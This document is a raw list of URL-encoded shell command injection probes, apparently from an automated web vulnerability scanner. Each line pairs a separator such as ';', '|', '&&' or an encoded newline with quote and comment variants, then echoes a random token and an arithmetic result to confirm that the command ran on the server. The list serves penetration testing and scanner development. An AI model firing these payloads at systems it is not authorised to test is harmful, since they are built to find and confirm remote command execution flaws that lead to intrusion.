+||echo%20BDYSBD$((59%2B26))$(echo%20BDYSBD)BDYSBD' +&&echo%20CALIKN$((75%2B57))$(echo%20CALIKN)CALIKN' +%0aecho%20KYPKBG$((37%2B59))$(echo%20KYPKBG)KYPKBG' +%3Becho%20AVWPBO$((84%2B81))$(echo%20AVWPBO)AVWPBO' +%26echo%20HAZQII$((51%2B98))$(echo%20HAZQII)HAZQII' +%26%26echo%20HDOQYX$((44%2B88))$(echo%20HDOQYX)HDOQYX' +%7Cecho%20KYMYXN$((53%2B93))$(echo%20KYMYXN)KYMYXN' +%7C%7Cecho%20BHIGBI$((12%2B1))$(echo%20BHIGBI)BHIGBI' +echo%20MIZDMG$((78%2B69))$(echo%20MIZDMG)MIZDMG" +%20echo%20YPBKYU$((68%2B53))$(echo%20YPBKYU)YPBKYU" +;echo%20KTEBYS$((87%2B50))$(echo%20KTEBYS)KTEBYS" +&echo%20ZJVXWJ$((77%2B27))$(echo%20ZJVXWJ)ZJVXWJ" +|echo%20BHRXBC$((7%2B14))$(echo%20BHRXBC)BHRXBC" +||echo%20MZRLUX$((2%2B69))$(echo%20MZRLUX)MZRLUX" +&&echo%20CKBCFD$((43%2B41))$(echo%20CKBCFD)CKBCFD" +%0aecho%20OJCTNP$((66%2B93))$(echo%20OJCTNP)OJCTNP" +%3Becho%20RYBOGB$((74%2B55))$(echo%20RYBOGB)RYBOGB" +%26echo%20RROLAU$((57%2B22))$(echo%20RROLAU)RROLAU" +%26%26echo%20QCERHI$((79%2B52))$(echo%20QCERHI)QCERHI" +%7Cecho%20UQZQYN$((62%2B42))$(echo%20UQZQYN)UQZQYN" +%7C%7Cecho%20JNIARV$((94%2B19))$(echo%20JNIARV)JNIARV" +echo%20HDXQEJ$((71%2B79))$(echo%20HDXQEJ)HDXQEJ +%20echo%20YNTIWO$((3%2B12))$(echo%20YNTIWO)YNTIWO +;echo%20TKERVJ$((79%2B50))$(echo%20TKERVJ)TKERVJ +&echo%20IWRTXC$((50%2B84))$(echo%20IWRTXC)IWRTXC +|echo%20STRIJS$((21%2B85))$(echo%20STRIJS)STRIJS +||echo%20MCNCTF$((18%2B60))$(echo%20MCNCTF)MCNCTF +&&echo%20ISDEXD$((91%2B65))$(echo%20ISDEXD)ISDEXD +%0aecho%20XSVPWX$((48%2B3))$(echo%20XSVPWX)XSVPWX +%3Becho%20CKRVVJ$((84%2B10))$(echo%20CKRVVJ)CKRVVJ +%26echo%20KWUNXK$((77%2B2))$(echo%20KWUNXK)KWUNXK +%26%26echo%20KYOTEZ$((85%2B71))$(echo%20KYOTEZ)KYOTEZ +%7Cecho%20ULTUWD$((51%2B75))$(echo%20ULTUWD)ULTUWD +%7C%7Cecho%20KFGGEG$((58%2B43))$(echo%20KFGGEG)KFGGEG +echo%20UBUDSE$((16%2B26))$(echo%20UBUDSE)UBUDSE// +%20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN// +;echo%20EHYWRC$((59%2B33))$(echo%20EHYWRC)EHYWRC// +&echo%20UOYNSV$((79%2B21))$(echo%20UOYNSV)UOYNSV// +|echo%20ZZWTRH$((46%2B12))$(echo%20ZZWTRH)ZZWTRH// +||echo%20UTNZMD$((71%2B95))$(echo%20UTNZMD)UTNZMD// +&&echo%20YHOOON$((42%2B16))$(echo%20YHOOON)YHOOON// +%0aecho%20ROPVAP$((13%2B72))$(echo%20ROPVAP)ROPVAP// +%3Becho%20NPXSTO$((33%2B52))$(echo%20NPXSTO)NPXSTO// +%26echo%20FHCIJT$((25%2B52))$(echo%20FHCIJT)FHCIJT// +%26%26echo%20YFZXJX$((50%2B26))$(echo%20YFZXJX)YFZXJX// +%7Cecho%20WRHIUR$((44%2B71))$(echo%20WRHIUR)WRHIUR// +%7C%7Cecho%20VVOSGY$((73%2B71))$(echo%20VVOSGY)VVOSGY// +echo%20NTPEFH$((79%2B40))$(echo%20NTPEFH)NTPEFH\ +%20echo%20GQTWXI$((72%2B93))$(echo%20GQTWXI)GQTWXI\ +;echo%20LYCBWG$((29%2B74))$(echo%20LYCBWG)LYCBWG\ +&echo%20COCFSF$((53%2B30))$(echo%20COCFSF)COCFSF\ +|echo%20DNZLFZ$((68%2B73))$(echo%20DNZLFZ)DNZLFZ\ +||echo%20CHDICH$((89%2B46))$(echo%20CHDICH)CHDICH\ +&&echo%20EOJNNV$((5%2B12))$(echo%20EOJNNV)EOJNNV\ +%0aecho%20MTJRGS$((58%2B47))$(echo%20MTJRGS)MTJRGS\ +%3Becho%20AXQXDI$((25%2B77))$(echo%20AXQXDI)AXQXDI\ +%26echo%20TLKWXC$((53%2B68))$(echo%20TLKWXC)TLKWXC\ +%26%26echo%20TTJGWL$((57%2B61))$(echo%20TTJGWL)TTJGWL\ +%7Cecho%20SESECV$((72%2B10))$(echo%20SESECV)SESECV\ +%7C%7Cecho%20DBIODL$((87%2B8))$(echo%20DBIODL)DBIODL\ +echo%20YBHKVY$((91%2B88))$(echo%20YBHKVY)YBHKVY& +%20echo%20TIXAPY$((54%2B72))$(echo%20TIXAPY)TIXAPY& +;echo%20JKKCWD$((16%2B48))$(echo%20JKKCWD)JKKCWD& +&echo%20BVRSLI$((35%2B17))$(echo%20BVRSLI)BVRSLI& +|echo%20VEMEGX$((63%2B29))$(echo%20VEMEGX)VEMEGX& +||echo%20OQQCRP$((22%2B72))$(echo%20OQQCRP)OQQCRP& +&&echo%20VNXUYU$((30%2B64))$(echo%20VNXUYU)VNXUYU& +%0aecho%20SROSKU$((1%2B28))$(echo%20SROSKU)SROSKU& +%3Becho%20VWPRCE$((29%2B7))$(echo%20VWPRCE)VWPRCE& +%26echo%20WLJIPQ$((79%2B90))$(echo%20WLJIPQ)WLJIPQ& +%26%26echo%20SSASTK$((41%2B1))$(echo%20SSASTK)SSASTK& +%7Cecho%20PVDDDJ$((29%2B98))$(echo%20PVDDDJ)PVDDDJ& +%7C%7Cecho%20WODZTP$((31%2B33))$(echo%20WODZTP)WODZTP& +echo%20JRBQAO$((30%2B54))$(echo%20JRBQAO)JRBQAO| +%20echo%20LYYSLZ$((61%2B82))$(echo%20LYYSLZ)LYYSLZ| +;echo%20SGDKKT$((60%2B36))$(echo%20SGDKKT)SGDKKT| +&echo%20SRNNCB$((90%2B39))$(echo%20SRNNCB)SRNNCB| +|echo%20LCIJBI$((90%2B7))$(echo%20LCIJBI)LCIJBI| +||echo%20HRBLJP$((7%2B73))$(echo%20HRBLJP)HRBLJP| +&&echo%20ELOSZQ$((77%2B50))$(echo%20ELOSZQ)ELOSZQ| +%0aecho%20SGYETR$((24%2B19))$(echo%20SGYETR)SGYETR| +%3Becho%20TJXONB$((49%2B24))$(echo%20TJXONB)TJXONB| +%26echo%20YCRSFZ$((33%2B21))$(echo%20YCRSFZ)YCRSFZ| +%26%26echo%20UWWCWD$((83%2B98))$(echo%20UWWCWD)UWWCWD| +%7Cecho%20XJGESW$((2%2B77))$(echo%20XJGESW)XJGESW| +%7C%7Cecho%20QBEEHF$((22%2B49))$(echo%20QBEEHF)QBEEHF| +echo%20TWRCSC$((11%2B79))$(echo%20TWRCSC)TWRCSC%27 +%20echo%20UTDRGU$((88%2B93))$(echo%20UTDRGU)UTDRGU%27 +;echo%20KMAFWV$((53%2B22))$(echo%20KMAFWV)KMAFWV%27 +&echo%20WYAISD$((66%2B10))$(echo%20WYAISD)WYAISD%27 +|echo%20EEPGGY$((39%2B86))$(echo%20EEPGGY)EEPGGY%27 +||echo%20CSDAYB$((1%2B92))$(echo%20CSDAYB)CSDAYB%27 +&&echo%20GHXSEE$((91%2B16))$(echo%20GHXSEE)GHXSEE%27 +%0aecho%20JLCIIE$((76%2B4))$(echo%20JLCIIE)JLCIIE%27 +%3Becho%20KTVSOY$((3%2B81))$(echo%20KTVSOY)KTVSOY%27 +%26echo%20NPROKF$((49%2B32))$(echo%20NPROKF)NPROKF%27 +%26%26echo%20TQYXWB$((55%2B46))$(echo%20TQYXWB)TQYXWB%27 +%7Cecho%20TAQPYI$((0%2B30))$(echo%20TAQPYI)TAQPYI%27 +%7C%7Cecho%20EMZGLE$((57%2B51))$(echo%20EMZGLE)EMZGLE%27 +echo%20VDJOCF$((50%2B82))$(echo%20VDJOCF)VDJOCF%22 +%20echo%20UDTOAM$((20%2B61))$(echo%20UDTOAM)UDTOAM%22 +;echo%20BUUBFP$((84%2B64))$(echo%20BUUBFP)BUUBFP%22 +&echo%20ZCQYVF$((95%2B44))$(echo%20ZCQYVF)ZCQYVF%22 +|echo%20JRKNBQ$((94%2B67))$(echo%20JRKNBQ)JRKNBQ%22 +||echo%20AHERUV$((2%2B2))$(echo%20AHERUV)AHERUV%22 +&&echo%20PSXDYR$((30%2B29))$(echo%20PSXDYR)PSXDYR%22 +%0aecho%20QDWRHU$((33%2B84))$(echo%20QDWRHU)QDWRHU%22 +%3Becho%20MUYISP$((6%2B57))$(echo%20MUYISP)MUYISP%22 +%26echo%20AUFDNI$((4%2B13))$(echo%20AUFDNI)AUFDNI%22 +%26%26echo%20KEKCUX$((55%2B27))$(echo%20KEKCUX)KEKCUX%22 +%7Cecho%20PUCKTG$((40%2B18))$(echo%20PUCKTG)PUCKTG%22 +%7C%7Cecho%20SPDMBT$((54%2B37))$(echo%20SPDMBT)SPDMBT%22 +echo%20WHLWIO$((67%2B20))$(echo%20WHLWIO)WHLWIO%5C%5C +%20echo%20VZZWBN$((81%2B34))$(echo%20VZZWBN)VZZWBN%5C%5C +;echo%20HMKHHL$((82%2B49))$(echo%20HMKHHL)HMKHHL%5C%5C +&echo%20ZBAFWV$((66%2B6))$(echo%20ZBAFWV)ZBAFWV%5C%5C +|echo%20UKNYWO$((51%2B97))$(echo%20UKNYWO)UKNYWO%5C%5C +||echo%20NIGBVP$((58%2B3))$(echo%20NIGBVP)NIGBVP%5C%5C +&&echo%20IIQUKI$((89%2B19))$(echo%20IIQUKI)IIQUKI%5C%5C +%0aecho%20ARNNHW$((53%2B8))$(echo%20ARNNHW)ARNNHW%5C%5C +%3Becho%20GDQLRU$((11%2B47))$(echo%20GDQLRU)GDQLRU%5C%5C +%26echo%20GVMHYL$((95%2B75))$(echo%20GVMHYL)GVMHYL%5C%5C +%26%26echo%20ZIFPOD$((88%2B33))$(echo%20ZIFPOD)ZIFPOD%5C%5C +%7Cecho%20CSSFWU$((98%2B21))$(echo%20CSSFWU)CSSFWU%5C%5C +%7C%7Cecho%20PWFAGG$((70%2B41))$(echo%20PWFAGG)PWFAGG%5C%5C +echo%20VWXGBL$((23%2B33))$(echo%20VWXGBL)VWXGBL%2F%2F +%20echo%20QZBSFJ$((43%2B35))$(echo%20QZBSFJ)QZBSFJ%2F%2F +;echo%20ARXZSC$((51%2B16))$(echo%20ARXZSC)ARXZSC%2F%2F +&echo%20EDOOGB$((28%2B29))$(echo%20EDOOGB)EDOOGB%2F%2F +|echo%20ELJTMV$((55%2B23))$(echo%20ELJTMV)ELJTMV%2F%2F +||echo%20HVNHYL$((74%2B86))$(echo%20HVNHYL)HVNHYL%2F%2F +&&echo%20KYHFUU$((41%2B61))$(echo%20KYHFUU)KYHFUU%2F%2F +%0aecho%20COCDTZ$((30%2B94))$(echo%20COCDTZ)COCDTZ%2F%2F +%3Becho%20FOTFWD$((3%2B5))$(echo%20FOTFWD)FOTFWD%2F%2F +%26echo%20UUQPGU$((66%2B46))$(echo%20UUQPGU)UUQPGU%2F%2F +%26%26echo%20CJDFNU$((77%2B46))$(echo%20CJDFNU)CJDFNU%2F%2F +%7Cecho%20VUMPEC$((81%2B13))$(echo%20VUMPEC)VUMPEC%2F%2F +%7C%7Cecho%20XJVKTW$((99%2B70))$(echo%20XJVKTW)XJVKTW%2F%2F +echo%20LFNYYO$((14%2B97))$(echo%20LFNYYO)LFNYYO%26 +%20echo%20IIDCDJ$((38%2B91))$(echo%20IIDCDJ)IIDCDJ%26 +;echo%20TLPKYY$((25%2B59))$(echo%20TLPKYY)TLPKYY%26 +&echo%20QPWISS$((90%2B73))$(echo%20QPWISS)QPWISS%26 +|echo%20NAEDRV$((86%2B62))$(echo%20NAEDRV)NAEDRV%26 +||echo%20TUAKKW$((59%2B81))$(echo%20TUAKKW)TUAKKW%26 +&&echo%20RYKJGR$((75%2B28))$(echo%20RYKJGR)RYKJGR%26 +%0aecho%20BJMVLS$((87%2B51))$(echo%20BJMVLS)BJMVLS%26 +%3Becho%20DCOSDU$((41%2B86))$(echo%20DCOSDU)DCOSDU%26 +%26echo%20ZPNTLA$((40%2B1))$(echo%20ZPNTLA)ZPNTLA%26 +%26%26echo%20YAEFHT$((74%2B26))$(echo%20YAEFHT)YAEFHT%26 +%7Cecho%20AFLTJA$((66%2B14))$(echo%20AFLTJA)AFLTJA%26 +%7C%7Cecho%20ITSQLY$((14%2B91))$(echo%20ITSQLY)ITSQLY%26 +echo%20KEIBVO$((81%2B19))$(echo%20KEIBVO)KEIBVO%7C +%20echo%20CXGLRL$((92%2B49))$(echo%20CXGLRL)CXGLRL%7C +;echo%20UQHDID$((15%2B76))$(echo%20UQHDID)UQHDID%7C +&echo%20XDZINA$((98%2B93))$(echo%20XDZINA)XDZINA%7C +|echo%20RGHPOG$((64%2B34))$(echo%20RGHPOG)RGHPOG%7C +||echo%20HYCXDP$((54%2B7))$(echo%20HYCXDP)HYCXDP%7C +&&echo%20SIYJRM$((59%2B4))$(echo%20SIYJRM)SIYJRM%7C +%0aecho%20KEARQO$((52%2B94))$(echo%20KEARQO)KEARQO%7C +%3Becho%20GBWBWQ$((60%2B85))$(echo%20GBWBWQ)GBWBWQ%7C +%26echo%20LPHFGP$((58%2B11))$(echo%20LPHFGP)LPHFGP%7C +%26%26echo%20VTKJBN$((70%2B38))$(echo%20VTKJBN)VTKJBN%7C +%7Cecho%20MRVLAB$((69%2B71))$(echo%20MRVLAB)MRVLAB%7C +%7C%7Cecho%20RAGAAW$((48%2B7))$(echo%20RAGAAW)RAGAAW%7C +%27echo%20XBOYVS$((29%2B20))$(echo%20XBOYVS)XBOYVS +%27%20echo%20GZAUTK$((17%2B45))$(echo%20GZAUTK)GZAUTK +%27;echo%20IETDFJ$((93%2B90))$(echo%20IETDFJ)IETDFJ +%27&echo%20NUBYOC$((86%2B87))$(echo%20NUBYOC)NUBYOC +%27|echo%20MXSHQC$((54%2B42))$(echo%20MXSHQC)MXSHQC +%27||echo%20FQFYSL$((20%2B12))$(echo%20FQFYSL)FQFYSL +%27&&echo%20SIPRCW$((44%2B64))$(echo%20SIPRCW)SIPRCW +%27%0aecho%20LDYDEO$((70%2B78))$(echo%20LDYDEO)LDYDEO +%27%3Becho%20GCPNLC$((57%2B96))$(echo%20GCPNLC)GCPNLC +%27%26echo%20SAULFA$((96%2B72))$(echo%20SAULFA)SAULFA +%27%26%26echo%20LPSXXC$((9%2B32))$(echo%20LPSXXC)LPSXXC +%27%7Cecho%20PELCUD$((9%2B37))$(echo%20PELCUD)PELCUD +%27%7C%7Cecho%20KXXNLE$((80%2B57))$(echo%20KXXNLE)KXXNLE +%27echo%20IOXVNX$((62%2B78))$(echo%20IOXVNX)IOXVNX' +%27%20echo%20QKGHPD$((17%2B97))$(echo%20QKGHPD)QKGHPD' +%27;echo%20YEDGRB$((80%2B41))$(echo%20YEDGRB)YEDGRB' +%27&echo%20RIAXZB$((29%2B3))$(echo%20RIAXZB)RIAXZB' +%27|echo%20EFMWXH$((10%2B86))$(echo%20EFMWXH)EFMWXH' +%27||echo%20KKZKEG$((23%2B59))$(echo%20KKZKEG)KKZKEG' +%27&&echo%20UDRFXR$((61%2B32))$(echo%20UDRFXR)UDRFXR' +%27%0aecho%20KAJBJB$((99%2B88))$(echo%20KAJBJB)KAJBJB' +%27%3Becho%20MHQWAF$((29%2B52))$(echo%20MHQWAF)MHQWAF' +%27%26echo%20NTKAFT$((47%2B6))$(echo%20NTKAFT)NTKAFT' +%27%26%26echo%20GAYYAM$((19%2B9))$(echo%20GAYYAM)GAYYAM' +%27%7Cecho%20TQBVPR$((29%2B56))$(echo%20TQBVPR)TQBVPR' +%27%7C%7Cecho%20JQLWQP$((26%2B32))$(echo%20JQLWQP)JQLWQP' +%27echo%20IOMPVA$((3%2B97))$(echo%20IOMPVA)IOMPVA" +%27%20echo%20BZYOZX$((41%2B40))$(echo%20BZYOZX)BZYOZX" +%27;echo%20FIMTOH$((82%2B28))$(echo%20FIMTOH)FIMTOH" +%27&echo%20YHYEFI$((32%2B68))$(echo%20YHYEFI)YHYEFI" +%27|echo%20BLYANI$((69%2B87))$(echo%20BLYANI)BLYANI" +%27||echo%20YELBOD$((58%2B80))$(echo%20YELBOD)YELBOD" +%27&&echo%20THTPHV$((84%2B16))$(echo%20THTPHV)THTPHV" +%27%0aecho%20DHXPBN$((74%2B0))$(echo%20DHXPBN)DHXPBN" +%27%3Becho%20YXEFFV$((66%2B19))$(echo%20YXEFFV)YXEFFV" +%27%26echo%20SQFUZG$((87%2B17))$(echo%20SQFUZG)SQFUZG" +%27%26%26echo%20RFPIMF$((21%2B62))$(echo%20RFPIMF)RFPIMF" +%27%7Cecho%20URCXUV$((95%2B4))$(echo%20URCXUV)URCXUV" +%27%7C%7Cecho%20HFJBUM$((87%2B87))$(echo%20HFJBUM)HFJBUM" +%27echo%20CPHNYZ$((5%2B38))$(echo%20CPHNYZ)CPHNYZ +%27%20echo%20IVJQAB$((70%2B54))$(echo%20IVJQAB)IVJQAB +%27;echo%20CWXAYU$((62%2B81))$(echo%20CWXAYU)CWXAYU +%27&echo%20SIOGAT$((82%2B21))$(echo%20SIOGAT)SIOGAT +%27|echo%20GXDPVN$((69%2B6))$(echo%20GXDPVN)GXDPVN +%27||echo%20ULPNTA$((21%2B48))$(echo%20ULPNTA)ULPNTA +%27&&echo%20LIFOQJ$((22%2B86))$(echo%20LIFOQJ)LIFOQJ +%27%0aecho%20LSICCV$((22%2B94))$(echo%20LSICCV)LSICCV +%27%3Becho%20MYVNVT$((42%2B57))$(echo%20MYVNVT)MYVNVT +%27%26echo%20SFPNFW$((13%2B14))$(echo%20SFPNFW)SFPNFW +%27%26%26echo%20XOEQUO$((65%2B74))$(echo%20XOEQUO)XOEQUO +%27%7Cecho%20JZJOSI$((32%2B42))$(echo%20JZJOSI)JZJOSI +%27%7C%7Cecho%20GQLDDF$((67%2B97))$(echo%20GQLDDF)GQLDDF +%27echo%20QFGAIQ$((42%2B15))$(echo%20QFGAIQ)QFGAIQ// +%27%20echo%20EGNSNW$((91%2B88))$(echo%20EGNSNW)EGNSNW// +%27;echo%20BXNDAG$((17%2B65))$(echo%20BXNDAG)BXNDAG// +%27&echo%20DUJCYR$((3%2B43))$(echo%20DUJCYR)DUJCYR// +%27|echo%20XXJDRI$((78%2B40))$(echo%20XXJDRI)XXJDRI// +%27||echo%20RTVDXH$((26%2B45))$(echo%20RTVDXH)RTVDXH// +%27&&echo%20DZOCJQ$((86%2B39))$(echo%20DZOCJQ)DZOCJQ// +%27%0aecho%20IKZDMH$((10%2B92))$(echo%20IKZDMH)IKZDMH// +%27%3Becho%20YSASGM$((95%2B50))$(echo%20YSASGM)YSASGM// +%27%26echo%20TSJQIY$((55%2B20))$(echo%20TSJQIY)TSJQIY// +%27%26%26echo%20ALGYVZ$((76%2B83))$(echo%20ALGYVZ)ALGYVZ// +%27%7Cecho%20GCKHEE$((25%2B33))$(echo%20GCKHEE)GCKHEE// +%27%7C%7Cecho%20IJHDBG$((39%2B40))$(echo%20IJHDBG)IJHDBG// +%27echo%20RMKRIK$((54%2B62))$(echo%20RMKRIK)RMKRIK\ +%27%20echo%20FRIWEP$((93%2B33))$(echo%20FRIWEP)FRIWEP\ +%27;echo%20HPMAEK$((9%2B6))$(echo%20HPMAEK)HPMAEK\ +%27&echo%20GPEMQS$((51%2B70))$(echo%20GPEMQS)GPEMQS\ +%27|echo%20YDDQHZ$((64%2B41))$(echo%20YDDQHZ)YDDQHZ\ +%27||echo%20SBOJIW$((28%2B58))$(echo%20SBOJIW)SBOJIW\ +%27&&echo%20QINFDZ$((25%2B98))$(echo%20QINFDZ)QINFDZ\ +%27%0aecho%20LJFJVH$((10%2B34))$(echo%20LJFJVH)LJFJVH\ +%27%3Becho%20AWVIEM$((26%2B50))$(echo%20AWVIEM)AWVIEM\ +%27%26echo%20PCODKZ$((48%2B2))$(echo%20PCODKZ)PCODKZ\ +%27%26%26echo%20SLPZUK$((69%2B4))$(echo%20SLPZUK)SLPZUK\ +%27%7Cecho%20GZDPZK$((6%2B29))$(echo%20GZDPZK)GZDPZK\ +%27%7C%7Cecho%20YEMQVY$((61%2B88))$(echo%20YEMQVY)YEMQVY\ +%27echo%20TKPBHT$((87%2B27))$(echo%20TKPBHT)TKPBHT& +%27%20echo%20VEQJIY$((50%2B4))$(echo%20VEQJIY)VEQJIY& +%27;echo%20WMMUXQ$((27%2B51))$(echo%20WMMUXQ)WMMUXQ& +%27&echo%20BJUNBG$((90%2B77))$(echo%20BJUNBG)BJUNBG& +%27|echo%20WEYPRV$((18%2B9))$(echo%20WEYPRV)WEYPRV& +%27||echo%20HVWYSC$((52%2B13))$(echo%20HVWYSC)HVWYSC& +%27&&echo%20ZUDZMD$((43%2B75))$(echo%20ZUDZMD)ZUDZMD& +%27%0aecho%20YJUICB$((52%2B55))$(echo%20YJUICB)YJUICB& +%27%3Becho%20ICUPEK$((37%2B11))$(echo%20ICUPEK)ICUPEK& +%27%26echo%20PAFSCK$((22%2B53))$(echo%20PAFSCK)PAFSCK& +%27%26%26echo%20VFVJGA$((34%2B26))$(echo%20VFVJGA)VFVJGA& +%27%7Cecho%20PEBEOY$((43%2B44))$(echo%20PEBEOY)PEBEOY& +%27%7C%7Cecho%20ETYFQP$((33%2B58))$(echo%20ETYFQP)ETYFQP& +%27echo%20MEZJPT$((67%2B11))$(echo%20MEZJPT)MEZJPT| +%27%20echo%20DOXQVC$((74%2B61))$(echo%20DOXQVC)DOXQVC| +%27;echo%20WAGVJJ$((84%2B94))$(echo%20WAGVJJ)WAGVJJ| +%27&echo%20YUMWMH$((91%2B2))$(echo%20YUMWMH)YUMWMH| +%27|echo%20VLQXSQ$((5%2B5))$(echo%20VLQXSQ)VLQXSQ| +%27||echo%20ZSDIEW$((96%2B12))$(echo%20ZSDIEW)ZSDIEW| +%27&&echo%20MWTYAC$((26%2B86))$(echo%20MWTYAC)MWTYAC| +%27%0aecho%20FXJFMZ$((67%2B82))$(echo%20FXJFMZ)FXJFMZ| +%27%3Becho%20HYRAZO$((93%2B48))$(echo%20HYRAZO)HYRAZO| +%27%26echo%20QVAOWT$((0%2B68))$(echo%20QVAOWT)QVAOWT| +%27%26%26echo%20MEJTEK$((75%2B29))$(echo%20MEJTEK)MEJTEK| +%27%7Cecho%20PTVJZR$((87%2B16))$(echo%20PTVJZR)PTVJZR| +%27%7C%7Cecho%20ZXDFVL$((67%2B12))$(echo%20ZXDFVL)ZXDFVL| +%27echo%20RGSQNO$((48%2B30))$(echo%20RGSQNO)RGSQNO%27 +%27%20echo%20DHRZFK$((82%2B16))$(echo%20DHRZFK)DHRZFK%27 +%27;echo%20MCJMIQ$((92%2B3))$(echo%20MCJMIQ)MCJMIQ%27 +%27&echo%20BQAOON$((14%2B21))$(echo%20BQAOON)BQAOON%27 +%27|echo%20QIQGXS$((79%2B42))$(echo%20QIQGXS)QIQGXS%27 +%27||echo%20XUDLIK$((35%2B13))$(echo%20XUDLIK)XUDLIK%27 +%27&&echo%20CDEUKI$((43%2B31))$(echo%20CDEUKI)CDEUKI%27 +%27%0aecho%20SDDGTU$((60%2B67))$(echo%20SDDGTU)SDDGTU%27 +%27%3Becho%20ZDXLMM$((81%2B23))$(echo%20ZDXLMM)ZDXLMM%27 +%27%26echo%20ZAXLWL$((53%2B15))$(echo%20ZAXLWL)ZAXLWL%27 +%27%26%26echo%20VYRMIL$((42%2B66))$(echo%20VYRMIL)VYRMIL%27 +%27%7Cecho%20CNIXGW$((42%2B54))$(echo%20CNIXGW)CNIXGW%27 +%27%7C%7Cecho%20PJQWDG$((53%2B4))$(echo%20PJQWDG)PJQWDG%27 +%27echo%20WMKULY$((97%2B40))$(echo%20WMKULY)WMKULY%22 +%27%20echo%20VJRMHC$((3%2B22))$(echo%20VJRMHC)VJRMHC%22 +%27;echo%20RKVIFI$((60%2B48))$(echo%20RKVIFI)RKVIFI%22 +%27&echo%20OLOQKQ$((39%2B2))$(echo%20OLOQKQ)OLOQKQ%22 +%27|echo%20RBWMSW$((98%2B45))$(echo%20RBWMSW)RBWMSW%22 +%27||echo%20NFTXSR$((84%2B40))$(echo%20NFTXSR)NFTXSR%22 +%27&&echo%20ICNFZX$((85%2B34))$(echo%20ICNFZX)ICNFZX%22 +%27%0aecho%20SXQQOX$((93%2B26))$(echo%20SXQQOX)SXQQOX%22 +%27%3Becho%20QQXBDZ$((99%2B24))$(echo%20QQXBDZ)QQXBDZ%22 +%27%26echo%20XZUUTF$((78%2B20))$(echo%20XZUUTF)XZUUTF%22 +%27%26%26echo%20DJDLKS$((28%2B16))$(echo%20DJDLKS)DJDLKS%22 +%27%7Cecho%20RMTAEV$((79%2B76))$(echo%20RMTAEV)RMTAEV%22 +%27%7C%7Cecho%20BRLUWI$((24%2B78))$(echo%20BRLUWI)BRLUWI%22 +%27echo%20HMZWLY$((77%2B96))$(echo%20HMZWLY)HMZWLY%5C%5C +%27%20echo%20DBCEVA$((9%2B19))$(echo%20DBCEVA)DBCEVA%5C%5C +%27;echo%20QDZRDC$((54%2B73))$(echo%20QDZRDC)QDZRDC%5C%5C +%27&echo%20SCIQBL$((85%2B51))$(echo%20SCIQBL)SCIQBL%5C%5C +%27|echo%20PRMMPK$((67%2B45))$(echo%20PRMMPK)PRMMPK%5C%5C +%27||echo%20WQKJHL$((97%2B29))$(echo%20WQKJHL)WQKJHL%5C%5C +%27&&echo%20FBQVWJ$((2%2B58))$(echo%20FBQVWJ)FBQVWJ%5C%5C +%27%0aecho%20SUTPRJ$((93%2B86))$(echo%20SUTPRJ)SUTPRJ%5C%5C +%27%3Becho%20IKGCWR$((71%2B55))$(echo%20IKGCWR)IKGCWR%5C%5C +%27%26echo%20RLARCW$((64%2B37))$(echo%20RLARCW)RLARCW%5C%5C +%27%26%26echo%20FIDBBA$((41%2B96))$(echo%20FIDBBA)FIDBBA%5C%5C +%27%7Cecho%20OWEWCR$((30%2B3))$(echo%20OWEWCR)OWEWCR%5C%5C +%27%7C%7Cecho%20JUQYUK$((27%2B47))$(echo%20JUQYUK)JUQYUK%5C%5C +%27echo%20YLNBVA$((75%2B72))$(echo%20YLNBVA)YLNBVA%2F%2F +%27%20echo%20DWDUKP$((90%2B61))$(echo%20DWDUKP)DWDUKP%2F%2F +%27;echo%20RWVNGG$((78%2B53))$(echo%20RWVNGG)RWVNGG%2F%2F +%27&echo%20VSBIXB$((26%2B99))$(echo%20VSBIXB)VSBIXB%2F%2F +%27|echo%20EBNPAG$((16%2B53))$(echo%20EBNPAG)EBNPAG%2F%2F +%27||echo%20VDIYTJ$((0%2B65))$(echo%20VDIYTJ)VDIYTJ%2F%2F +%27&&echo%20NLWQZV$((48%2B73))$(echo%20NLWQZV)NLWQZV%2F%2F +%27%0aecho%20NZXQYS$((60%2B28))$(echo%20NZXQYS)NZXQYS%2F%2F +%27%3Becho%20DRGCTI$((40%2B71))$(echo%20DRGCTI)DRGCTI%2F%2F +%27%26echo%20YQPXBQ$((33%2B15))$(echo%20YQPXBQ)YQPXBQ%2F%2F +%27%26%26echo%20KBSBEA$((42%2B79))$(echo%20KBSBEA)KBSBEA%2F%2F +%27%7Cecho%20ENACLF$((45%2B12))$(echo%20ENACLF)ENACLF%2F%2F +%27%7C%7Cecho%20QZICOQ$((45%2B93))$(echo%20QZICOQ)QZICOQ%2F%2F +%27echo%20RQZWBL$((44%2B68))$(echo%20RQZWBL)RQZWBL%26 +%27%20echo%20PQOBOJ$((4%2B75))$(echo%20PQOBOJ)PQOBOJ%26 +%27;echo%20ZPHRKV$((85%2B32))$(echo%20ZPHRKV)ZPHRKV%26 +%27&echo%20PLTXSN$((86%2B55))$(echo%20PLTXSN)PLTXSN%26 +%27|echo%20XLWNAZ$((67%2B28))$(echo%20XLWNAZ)XLWNAZ%26 +%27||echo%20NCRWHM$((61%2B27))$(echo%20NCRWHM)NCRWHM%26 +%27&&echo%20VNSCPP$((62%2B21))$(echo%20VNSCPP)VNSCPP%26 +%27%0aecho%20OUPQQD$((2%2B0))$(echo%20OUPQQD)OUPQQD%26 +%27%3Becho%20GAJFQI$((99%2B73))$(echo%20GAJFQI)GAJFQI%26 +%27%26echo%20TQUBCH$((14%2B97))$(echo%20TQUBCH)TQUBCH%26 +%27%26%26echo%20RPLSNW$((41%2B19))$(echo%20RPLSNW)RPLSNW%26 +%27%7Cecho%20OYOVQI$((33%2B96))$(echo%20OYOVQI)OYOVQI%26 +%27%7C%7Cecho%20IYHEBU$((64%2B26))$(echo%20IYHEBU)IYHEBU%26 +%27echo%20KPNQGS$((46%2B86))$(echo%20KPNQGS)KPNQGS%7C +%27%20echo%20WDKUFJ$((39%2B52))$(echo%20WDKUFJ)WDKUFJ%7C +%27;echo%20GFACXP$((32%2B46))$(echo%20GFACXP)GFACXP%7C +%27&echo%20NCNRPJ$((94%2B40))$(echo%20NCNRPJ)NCNRPJ%7C +%27|echo%20KBYQUW$((20%2B94))$(echo%20KBYQUW)KBYQUW%7C +%27||echo%20QQHXIW$((77%2B85))$(echo%20QQHXIW)QQHXIW%7C +%27&&echo%20EFAUWG$((53%2B25))$(echo%20EFAUWG)EFAUWG%7C +%27%0aecho%20UDKFRM$((88%2B90))$(echo%20UDKFRM)UDKFRM%7C +%27%3Becho%20HWICQB$((1%2B54))$(echo%20HWICQB)HWICQB%7C 